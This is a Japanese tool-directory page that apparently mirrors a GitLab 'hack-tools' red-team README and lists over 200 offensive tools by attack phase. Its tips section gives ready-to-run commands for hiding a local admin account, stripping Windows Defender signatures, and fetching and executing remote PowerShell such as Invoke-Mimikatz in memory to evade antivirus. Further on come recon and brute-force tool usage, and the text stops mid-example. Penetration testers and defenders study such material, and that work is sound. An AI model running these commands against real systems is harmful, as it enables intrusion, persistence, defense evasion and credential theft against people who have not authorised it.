Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitLabGitLab/edu0x01/hack-tools
防御ツールフィッシングツール特権昇格偵察エクスプロイトフレームワーク横移動ペネトレーションテストコマンド&コントロール学習と教育レッドチーミング厳選リソースペイロード開発
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitLabedu0x01/hack-tools

Hack Tools

複数のペンテストツールを統合したプロジェクト

リポジトリを見るウェブサイト

ハックツール

このリポジトリには、レッドチーム活動に役立つ 200 以上の ツールと リソースが含まれています。

一部のツールはレッドチーム向けに特別に設計されているものもあれば、より汎用的でレッドチームのコンテキストに適応できるものもあります。

警告

このリポジトリの資料は情報提供および教育目的のみです。違法行為での使用を意図したものではありません。

注記

矢印でツールリストの見出しを非表示にします。

🔙 をクリックするとリストに戻ります。

クローン用コマンド```bash

git submodule update --init --recursive

root@kitploit:~
### 新しいプロジェクトを追加```bash
git submodule add https://github.com/example.git

docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules

ツール一覧

レッドチームのヒント $\textcolor{gray}{\text{13のヒント}}$
    • ローカル管理者アカウントの非表示 @Alh4zr3d
    • シグネチャを削除してWindows Defenderを無力化する @Alh4zr3d
    • ユーザーごとの複数RDPセッションを有効化 @Alh4zr3d
    • Sysinternals PsExec.exeのローカル代替 @GuhnooPlusLinux
    • 既存のツールを使ったポートスキャナー @Alh4zr3d
    • プロキシ対応PowerShell DownloadString @Alh4zr3d
    • ブラウザブックマークからの内部エンドポイントの検索 @Alh4zr3d
    • 列挙のためのDNSレコードのクエリ @Alh4zr3d
    • PowerUpを使わない引用符なしサービスパス @Alh4zr3d
    • /kを使った無効化されたコマンドプロンプトの回避 Martin Sohn Christensen
    • Windows Defenderによるmimikatz.exeの削除を阻止 @GuhnooPlusLinux
    • 仮想マシン内かどうかの確認 @dmcxblue
    • AppLockerルールの列挙 @Alh4zr3d
偵察 $\textcolor{gray}{\text{20のツール}}$
    • crt.sh -> httprobe -> EyeWitness 自動ドメインスクリーンショット
    • jsendpoints ページのDOMリンク抽出
    • nuclei 脆弱性スキャナー
    • certSniff 証明書透明性ログのキーワードスニファー
    • gobuster ウェブサイトのパスブルートフォース
    • feroxbuster Rustで書かれた高速コンテンツ発見ツール
    • CloudBrute クラウドインフラのブルートフォース
    • dnsrecon DNSレコードの列挙
    • Shodan.io 公開システムの知識ベース
    • AORT(オールインワン偵察ツール) サブドメイン列挙
    • spoofcheck SPF/DMARCレコードチェッカー
    • AWSBucketDump S3バケット列挙
    • GitHarvester GitHubクレデンシャル検索
    • truffleHog GitHubクレデンシャルスキャナー
    • Dismap 資産発見/識別
    • enum4linux Windows/samba列挙
    • skanuvaty 非常に高速なDNS/ネットワーク/ポートスキャナー
    • Metabigor API不要のOSINTツール
    • Gitrob GitHub機密情報スキャナー
    • gowitness Chromeヘッドレスを使ったウェブスクリーンショットユーティリティ
リソース開発 $\textcolor{gray}{\text{8のツール}}$
    • Chimera PowerShell難読化
    • msfvenom ペイロード作成
    • Shellter 動的シェルコードインジェクションツール
    • Freeze ペイロード作成(EDR回避)
    • WordSteal Microsoft WordでのNTMLハッシュ窃取
    • WSH Wshペイロード
    • HTA Htaペイロード
    • VBA Vbaペイロード
初期アクセス $\textcolor{gray}{\text{6のツール}}$
    • Bash Bunny USB攻撃ツール
    • EvilGoPhish フィッシングキャンペーンフレームワーク
    • The Social-Engineer Toolkit フィッシングキャンペーンフレームワーク
    • Hydra ブルートフォースツール
    • SquarePhish OAuth/QRコードフィッシングフレームワーク
    • King Phisher フィッシングキャンペーンフレームワーク
実行 $\textcolor{gray}{\text{12のツール}}$
    • Responder LLMNR、NBT-NS、MDNSポイズナー
    • secretsdump リモートハッシュダンパー
    • evil-winrm WinRMシェル
    • Donut インメモリ.NET実行
    • Macro_pack マクロ難読化
    • PowerSploit PowerShellスクリプトスイート
    • Rubeus Active Directoryハックツール
    • SharpUp Windows脆弱性識別ツール
    • SQLRecon 攻撃的MS-SQLツールキット
    • UltimateAppLockerByPassList 一般的なAppLocker回避テクニック
    • StarFighters JavaScriptおよびVBScriptベースのEmpireランチャー
    • demiguise HTA暗号化ツール
永続化 $\textcolor{gray}{\text{4のツール}}$
    • Impacket Pythonスクリプトスイート
    • Empire ポストエクスプロイトフレームワーク
    • SharPersist Windows永続化ツールキット
    • ligolo-ng TUNインターフェースを使用したトンネリングツール
権限昇格 $\textcolor{gray}{\text{9のツール}}$
    • LinPEAS Linux権限昇格
    • WinPEAS Windows権限昇格
    • linux-smart-enumeration Linux権限昇格
    • Certify Active Directory権限昇格
    • Get-GPPPassword Windowsパスワード抽出
    • Sherlock PowerShell権限昇格ツール
    • Watson Windows権限昇格ツール
    • ImpulsiveDLLHijack DLLハイジャックツール
    • ADFSDump AD FSダンプツール
防御回避 $\textcolor{gray}{\text{5のツール}}$
    • Invoke-Obfuscation スクリプト難読化
    • Veil Metasploitペイロード難読化
    • SharpBlock エントリポイント実行防止によるEDR回避
    • Alcatraz GUI x64バイナリ難読化
    • Mangle コンパイル済み実行ファイルの操作
    • AMSI Fail AMSIを破壊または無効化するPowerShellスニペット
資格情報アクセス $\textcolor{gray}{\text{9のツール}}$
    • Mimikatz Windows資格情報抽出
    • LaZagne ローカルパスワード抽出
    • hashcat パスワードハッシュクラッキング
    • John the Ripper パスワードハッシュクラッキング
    • SCOMDecrypt SCOM資格情報復号ツール
    • nanodump LSASSプロセスミニダンプ作成
    • eviltree 資格情報発見のためのtree改良版
    • SeeYouCM-Thief Cisco電話システム設定ファイル解析
    • MailSniper Microsoft Exchangeメール検索
発見 $\textcolor{gray}{\text{6のツール}}$
    • PCredz 資格情報発見(PCAP/ライブインターフェース)
    • PingCastle Active Directory評価ツール
    • Seatbelt ローカル脆弱性スキャナー
    • ADRecon Active Directory偵察
    • adidnsdump Active Directory統合DNSダンプ
    • scavenger システムのスカベンジング用スキャンツール
横方向移動 $\textcolor{gray}{\text{12のツール}}$
    • crackmapexec Windows/Active Directory横方向移動ツールキット
    • WMIOps WMIリモートコマンド
    • PowerLessShell PowerShellを使わないリモートPowerShell
    • PsExec 軽量telnet代替
    • LiquidSnake ファイルレス横方向移動
    • Enabling RDP Windows RDP有効化コマンド
    • Upgrading shell to meterpreter リバースシェルの改善
    • Forwarding Ports ローカルポートフォワードコマンド
    • Jenkins reverse shell Jenkinsシェルコマンド
    • ADFSpoof AD FSセキュリティトークンの偽造
    • kerbrute Kerberos事前認証ブルートフォースツール
    • Coercer Windowsサーバーに認証を強制するツール
収集 $\textcolor{gray}{\text{3のツール}}$
    • BloodHound Active Directory可視化
    • Snaffler Active Directory資格情報収集
    • linWinPwn Active Directory列挙と脆弱性チェック
コマンド&コントロール $\textcolor{gray}{\text{6のツール}}$
    • Havoc コマンド&コントロールフレームワーク
    • Covenant コマンド&コントロールフレームワーク(.NET)
    • Merlin コマンド&コントロールフレームワーク(Golang)
    • Metasploit Framework コマンド&コントロールフレームワーク(Ruby)
    • Pupy コマンド&コントロールフレームワーク(Python)
    • Brute Ratel コマンド&コントロールフレームワーク($$$)
データ流出 $\textcolor{gray}{\text{5のツール}}$
    • Dnscat2 DNSトンネリングによるC2
    • Cloakify データ流出のためのデータ変換
    • PyExfil データ流出PoC
    • Powershell RAT Pythonベースのバックドア
    • GD-Thief Google Driveデータ流出
影響 $\textcolor{gray}{\text{3のツール}}$
    • Conti Pentester Guide Leak Contiランサムウェアグループのアフィリエイトツールキット
    • SlowLoris 簡易サービス拒否
    • usbkill アンチフォレンジックキルスイッチ

レッドチームのヒント

レッドチームのヒント集から学びましょう。これらのヒントは、レッドチームの能力を向上させるための戦術、ツール、方法論を網羅しています。

注意: 現在、ほぼすべてのヒントは @Alh4zr3d からのものです。彼は優れたレッドチームのヒントを投稿しています!

🔙ローカル管理者アカウントの非表示```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Description:** _'アカウント作成はブルーチームを回避する際にリスクが伴いますが、ローカル管理者を作成する際にはレジストリで可愛い魔法を使って隠しましょう。'_

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)シグネチャを削除してWindows Defenderを無力化する```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

説明: '少し乱雑ですが、Windows Defenderが大きな頭痛の種になっているなら、無効にする(ユーザーに警告が表示される)代わりに、すべての署名を削除して無力化するべきです。'

クレジット: @Alh4zr3d

リンク: Twitter

🔙ユーザーごとに複数のRDPセッションを有効にする```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**説明:** _'RDPなどでホストにログインしたいが、ユーザーがアクティブなセッションを持っている場合があります。ユーザーごとに複数のセッションを有効にします。'_

**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Sysinternals PsExec.exe ローカル代替```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

説明: 'Sysinternals PsExec.exeをアップロードして横方向の移動を行うのに疲れていませんか?Windowsにはプリインストールされたより良い代替手段があります。代わりにこれを試してみてください。'

クレジット: @GuhnooPlusLinux

リンク: Twitter

🔙ローカルリソースを使ったポートスキャナー```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**説明:** _'可能な限り、ツールをマシンにアップロードせずに現地のリソースを活用すべきです(多くの理由から)。PowerShell/.NETが役立ちます。例: PowerShellを使った簡単なポートスキャナー。'_

**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)プロキシ対応 PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

説明: '最近、ほとんどの大規模組織はWebプロキシを使用しています。標準のPowerShellダウンロードクラドルはプロキシに対応していません。これを使用してください。'

クレジット: @Alh4zr3d

リンク: Twitter

🔙ブラウザのブックマークで内部エンドポイントを探す```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**説明:** _「ユーザーのブックマークだけで驚くほど多くの情報が見つかるものです。例えば、彼らがアクセスできる内部エンドポイントなど。」_

**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)列挙のためにDNSレコードを照会する```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

説明: '列挙はゲームの95%を占める。しかし、環境を評価するために大量のスキャンを起動するのは非常に騒がしい。なぜDC/DNSサーバーにすべてのDNSレコードを問い合わせないのか?'

クレジット: @Alh4zr3d

リンク: Twitter

🔙引用符なしのサービスパス(PowerUpなし)```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**説明:** _'PowerUpを使わない引用符なしサービスパスの検出'_

**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**リンク:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)無効化されたコマンドプロンプトを/kでバイパスする```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

説明: 「このコマンド プロンプトは管理者により無効にされています...」は、通常キオスクPCなどの環境で見られます。簡単なハッキング的な回避策として、Windowsのファイル名を指定して実行ボックスで /k を使用することです。これによりコマンドが実行され、その後制限メッセージが表示され、コマンド実行が可能になります。

クレジット: Martin Sohn Christensen

リンク: ブログ

🔙Windows Defenderがmimikatz.exeを削除するのを防ぐ```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**説明:** _'Windows Defenderがmimikatz.exeを削除するのにうんざりしていませんか?代わりにこれを試してみてください。'_

**クレジット:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**リンク:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)仮想マシン内にいるかどうかを確認する```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

説明: '仮想マシン内にいるかどうかを知りたいですか?レジストリキーを照会して確認してください!!! 結果が表示されれば、仮想マシン内にいることになります。'

クレジット: @dmcxblue

リンク: Twitter

🔙AppLockerルールを列挙する```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**説明:** _'AppLockerは厄介な存在になることがあります。どれほど厄介か確認するために列挙しましょう'_

**クレジット:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**リンク:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

# 偵察

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

以下のようなbashのワンライナーを作成しました:

- 証明書の関連付けからサブドメインのリストを受動的に収集します([crt.sh](https://crt.sh/))
- 各サブドメインに能動的にリクエストを送信し、その存在を確認します([httprobe](https://github.com/tomnomnom/httprobe))
- 各サブドメインを能動的にスクリーンショットし、手動レビューに備えます([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**使い方:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

_注: httprobe、pup、EyeWitness がインストールされている必要があり、'DOMAIN_COM' を対象ドメインに変更してください。複数の対象ルートドメインがある場合、このスクリプトをターミナルウィンドウで同時に実行できます。

image

image

🔙jsendpoints

ページ上のすべてのウェブページエンドポイントリンクを抽出するJavaScriptブックマークレットです。

作成者: @renniepak。このJavaScriptコードスニペットは、現在のウェブページのDOMから、埋め込まれたすべての外部スクリプトソースを含むすべてのエンドポイント(/で始まる)を抽出するために使用できます。```javascript javascript: (function () { var scripts = document.getElementsByTagName("script"), regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g; const results = new Set(); for (var i = 0; i < scripts.length; i++) { var t = scripts[i].src; "" != t && fetch(t) .then(function (t) { return t.text(); }) .then(function (t) { var e = t.matchAll(regex); for (let r of e) results.add(r[0]); }) .catch(function (t) { console.log("An error occurred: ", t); }); } var pageContent = document.documentElement.outerHTML, matches = pageContent.matchAll(regex); for (const match of matches) results.add(match[0]); function writeResults() { results.forEach(function (t) { document.write(t + "
"); }); } setTimeout(writeResults, 3e3); })();

root@kitploit:~
**使用方法(ブックマークレット)**

ブックマークレットを作成します...

- `ブックマークバーを右クリック`
- `「ページを追加」をクリック`
- `上記のJavaScriptを「URL」ボックスに貼り付け`
- `「保存」をクリック`

...その後、ブラウザで被害者ページにアクセスし、ブックマークレットをクリックします。

![image](https://assets.kitploit.com/production/public/readmes/495/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**使用方法(コンソール)**

上記のJavaScriptをコンソールウィンドウ`F12`に貼り付け、Enterキーを押します。

![image](https://assets.kitploit.com/production/public/readmes/495/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

特定の脆弱性を検索するために.yamlテンプレートを使用する高速な脆弱性スキャナー。

**インストール:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

使用方法:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)

<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">nucleiエンジン向けにコミュニティが厳選したテンプレートリストで、アプリケーションのセキュリティ脆弱性を発見します。</h4>

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
      
<p align="center">
  <a href="https://nuclei.projectdiscovery.io/templating-guide/">ドキュメント</a> •
  <a href="#-contributions">貢献</a> •
  <a href="#-discussion">ディスカッション</a> •
  <a href="#-community">コミュニティ</a> •
  <a href="https://nuclei.projectdiscovery.io/faq/templates/">よくある質問</a> •
  <a href="https://discord.gg/projectdiscovery">DCに参加</a>
</p>

---

テンプレートは、実際のスキャンエンジンを動かす [nuclei scanner](https://github.com/projectdiscovery/nuclei) の中核です。このリポジトリは、私たちのチームが提供するものだけでなく、コミュニティから提供されたスキャナー用のさまざまなテンプレートを保存・管理しています。**プルリクエスト** または [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) を通じてテンプレートを送信し、リストを充実させることにご協力いただければ幸いです。

## Nuclei Templates 概要

nucleiテンプレートプロジェクトの概要です。ユニークなタグ、作成者、ディレクトリ、深刻度、テンプレートの種類の統計情報が含まれます。以下の表は、各マトリックスのトップ10の統計情報を示しています。拡張版は[こちら](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md)で、統合用の[JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json)形式でも利用できます。

<table>
<tr>
<td>

## Nuclei Templates トップ10統計

| TAG       | COUNT | AUTHOR       | COUNT | DIRECTORY            | COUNT | SEVERITY | COUNT | TYPE | COUNT |
| --------- | ----- | ------------ | ----- | -------------------- | ----- | -------- | ----- | ---- | ----- |
| cve       | 1855  | dhiyaneshdk  | 835   | http                 | 5860  | info     | 2857  | file | 123   |
| panel     | 896   | dwisiswant0  | 794   | workflows            | 190   | high     | 1270  | dns  | 18    |
| wordpress | 781   | daffainfo    | 664   | file                 | 123   | medium   | 1042  |      |       |
| exposure  | 677   | pikpikcu     | 353   | network              | 93    | critical | 704   |      |       |
| wp-plugin | 672   | pdteam       | 278   | dns                  | 18    | low      | 216   |      |       |
| xss       | 646   | pussycat0x   | 240   | ssl                  | 12    | unknown  | 26    |      |       |
| osint     | 639   | geeknik      | 220   | headless             | 9     |          |       |      |       |
| tech      | 602   | ricardomaia  | 215   | TEMPLATES-STATS.json | 1     |          |       |      |       |
| edb       | 596   | ritikchaddha | 210   | contributors.json    | 1     |          |       |      |       |
| lfi       | 548   | 0x_akoko     | 179   | cves.json            | 1     |          |       |      |       |

**404 ディレクトリ、6542 ファイル**。

</td>
</tr>
</table>

## 📖 ドキュメント

詳細なドキュメントについては、https://nuclei.projectdiscovery.io にアクセスして、新しい **カスタム** テンプレートや **独自の** テンプレートを **ビルド** してください。また、仕組みを理解するためのテンプレートセットも追加しています。

## 💪 貢献

Nuclei-templates はコミュニティからの多大な貢献によって支えられています。[テンプレートの貢献](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+)、[機能リクエスト](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+)、[バグ報告](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)を歓迎します。

![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats 分析画像")

## 💬 ディスカッション

質問や疑問、議論したいアイデアがありますか?[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) ボードで気軽にディスカッションを開始してください。

## 👨‍💻 コミュニティ

活発な [Discord Community](https://discord.gg/projectdiscovery) に参加して、プロジェクトメンテナーと直接議論したり、セキュリティや自動化に関することを他の人と共有してください。また、[Twitter](https://twitter.com/pdnuclei) でフォローしていただくと、Nucleiに関するすべての最新情報を受け取れます。

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
  <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&amp;max=300">
</a>
</p>

改めて、皆様のご貢献とこのコミュニティを活気づけていただきありがとうございます。:heart:

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff は、Pythonで作成されたCertificate Transparencyログのキーワードウォッチャーです。certstreamライブラリを使用して、ファイルで定義されたキーワードを含む証明書作成ログを監視します。

標的ドメインに関連するいくつかのキーワードを設定して実行すると、証明書の作成が記録され、これまで知らなかったドメインを発見できる可能性があります。

**インストール:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

使用方法:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/5cfb98ddfd270f9f57aa774a49dd21ee41ae79bbf430e012834e9c85cf221c5e.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

被害者サイトのファイル/フォルダパスをブルートフォースするための便利なツール。

**インストール:**```bash
sudo apt install gobuster

使用方法:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

強制ブラウジング(Forced Browsing)攻撃を実行するために設計されたツールです。この攻撃の目的は、Webアプリケーションから参照されていないものの、攻撃者がアクセス可能なリソースを列挙し、アクセスすることです。

Feroxbusterは、ブルートフォースとワードリストを組み合わせて、ターゲットディレクトリ内のリンクされていないコンテンツを検索します。これらのリソースには、ソースコード、認証情報、内部ネットワークアドレスなど、Webアプリケーションや運用システムに関する機密情報が保存されている可能性があります。

**インストール: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

インストール: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**インストール: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

完全なインストール手順については、こちらを参照してください。

使用方法:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
完全な使用例は[こちら](https://epi052.github.io/feroxbuster-docs/docs/examples/)にあります。

![image](https://assets.kitploit.com/production/public/readmes/495/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

_画像は https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif から使用されています_

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

トップクラウドプロバイダー(Amazon、Google、Microsoft、DigitalOcean、Alibaba、Vultr、Linode)上で、企業(ターゲット)のインフラ、ファイル、アプリを見つけるためのツールです。

特徴:

- クラウド検出(IPINFO API およびソースコード)
- 高速(並行処理)
- クロスプラットフォーム(windows、linux、mac)
- User-Agent ランダム化
- Proxy ランダム化(HTTP、Socks5)

**インストール:**

最新の[リリース](https://github.com/0xsha/CloudBrute/releases)をあなたのシステム向けにダウンロードし、使用方法に従ってください。

**使用方法:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

画像は https://github.com/0xsha/CloudBrute から使用

🔙dnsrecon

dnsrecon は DNS レコード(MX、SOA、NS、A、AAAA、SPF、TXT)を列挙するための Python ツールであり、単一のドメイン検索からピボット可能な新しい関連被害ホストを多数提供できます。

Install:```bash sudo apt install dnsrecon

root@kitploit:~
**使用法:**```bash
dnsrecon -d google.com

image

🔙shodan.io

Shodanは公開インフラストラクチャをクロールし、検索可能な形式で表示します。会社名、ドメイン名、IPアドレスを使用して、shodanを介してターゲットに関連する潜在的に脆弱なシステムを発見することが可能です。

image

🔙AORT

サブドメインの列挙、DNSの列挙、WAF検出、WHOIS、ポートスキャン、Wayback Machine、メールハーベスティングのためのツール。

インストール:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**使用方法:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

ドメインがスプーフィング可能かどうかをチェックするプログラムです。このプログラムは、SPFおよびDMARCレコードをチェックし、スプーフィングを許す脆弱な設定を検出します。さらに、SPF/DKIMメールの失敗時にメールやHTTPリクエストを送信するDMARC設定がドメインに存在する場合に警告を発します。

以下の条件のいずれかを満たす場合、ドメインはスプーフィング可能です。

  • SPFまたはDMARCレコードが存在しない
  • SPFレコードが~allまたは-allを指定していない
  • DMARCポリシーがp=noneに設定されている、または存在しない

インストール:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**使用方法:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDumpは、AWS S3バケットを迅速に列挙し、興味深いファイルを探すためのツールです。サブドメインのブルートフォースツールに似ていますが、S3バケット専用に作られており、ファイルをgrepしたり、興味深いファイルをダウンロードするための追加機能も備えています。

インストール:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**使用方法:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

GitHubから正規表現を使って情報を収集するための便利なツール。特定のGitHubユーザーやプロジェクトを検索する機能も備えています。

インストール:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**使い方:**```
./githarvester.py

🔙truffleHog

TruffleHogは、高エントロピー文字列やパスワード、APIキーといったシークレットの存在を示す可能性のあるパターンを探すためにgitリポジトリをスキャンするツールです。TruffleHogを使用すると、リポジトリに誤ってコミット・プッシュされた可能性のある機密情報を迅速かつ簡単に見つけることができます。

インストール (バイナリ): Link

インストール (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**使い方:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismapは、アセットの発見と識別を行うツールです。web/tcp/udpなどのプロトコルやフィンガープリント情報を迅速に識別し、アセットの種類を特定できます。内部ネットワークと外部ネットワークの両方に適しています。

Dismapは完全なフィンガープリントルールベースを備えており、現在tcp/udp/tlsプロトコルのフィンガープリントと4500以上のwebフィンガープリントルールを含み、favicon、body、headerなどを識別できます。

インストール:

DismapはLinux、MacOS、Windows用のバイナリファイルです。Releaseにアクセスして、対応するバージョンをダウンロードし実行してください。```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**使い方:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
